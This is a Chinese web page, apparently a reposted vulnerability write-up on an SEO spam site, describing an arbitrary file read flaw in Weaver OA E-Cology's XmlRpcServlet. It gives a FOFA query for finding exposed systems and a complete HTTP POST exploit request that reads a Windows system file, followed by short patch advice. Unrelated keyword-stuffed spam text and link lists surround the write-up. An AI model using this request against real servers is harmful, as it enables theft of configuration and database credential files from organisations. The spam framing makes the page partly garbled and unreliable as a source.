当前位置: 首页 > news >正文

办理工商注册的公司南宁seo公司哪家好

办理工商注册的公司,南宁seo公司哪家好,网站开发培训哪里好,注册无区域公司有什么要求漏洞介绍 泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微OA E-Cology 平台XmRpcServlet接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件 (如数据库配置…

漏洞介绍

泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微OA E-Cology 平台XmRpcServlet接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件 (如数据库配置文件、系统配置文件) 、数据库配置文件等等,导致网站处于极度不安全状态。

FOFA

app=“泛微-OA(e-cology)”

漏洞复现

读取win.ini文件

POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/xml
Accept-Encoding: gzip
Content-Length: 218
Connection: keep-alive<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>WorkflowService.getAttachment</methodName>
<params>
<param>
<value><string>c://windows/win.ini</string></value>
</param>
</params>
</methodCall>

在这里插入图片描述
对返回的密文进行解码
在这里插入图片描述

修复建议

官方已修复该漏洞,请用户联系商修复漏洞: https://www.weaver.com.cn/cs/securityDownload.htm
通过防火墙等安全设备设置访问策略,设置白名单访问。
如非必要,禁止公网访问该系统.

http://www.shuangfujiaoyu.com/news/23715.html

相关文章:

  • 郑州销售网站搜狐三季度营收多少
  • 外贸网站建设要注意什么跨境网站建站
  • WordPress调用指定分类目录链接优化方法
  • 济南网站建设jnwuyiapp推广拉新一手渠道
  • 站长工具ip地址查询域名百度广告投放技巧
  • 精品手机网站案例中国seo谁最厉害
  • 建设工程规范在哪个网站下载微信拓客的最新方法
  • 网站快排是怎么做的国际购物网站平台有哪些
  • 网站防护空间优化设计四年级上册数学答案
  • 百度快速收录软件南宁网站seo
  • 经营范围里的网站建设谷歌搜索排名
  • 做网站需要切图吗编写网页的软件
  • 南通网站建设教程google下载官网
  • 网站的注册安卓在线视频嗅探app
  • 爱演示网如何优化
  • 做两个单页面网站大概多少钱企业管理培训课程视频
  • 专业做网站路桥在线查询网站收录
  • 南昌网站建设哪家好好看的web网页
  • 企业网站维护的主要内容苏州网站建设书生商友
  • 龙井网站建设今日最新财经新闻
  • 大型小说网站开发语言新媒体营销案例分析
  • 高校网站开发企业推广的渠道有哪些
  • 做网站banner商丘seo博客
  • 广东做网站策划深圳网络推广大师
  • 网站美工设计基础广告营销推广
  • 网站上的美工图片要怎么做今日百度小说排行榜
  • 用KEGG网站做通路富集分析企业如何进行搜索引擎优化
  • 网站建设维护公司资质网络营销是什么意思?
  • 高端网站建设报价百度关键词seo排名软件
  • 做网站做域名百度快照没有了用什么代替了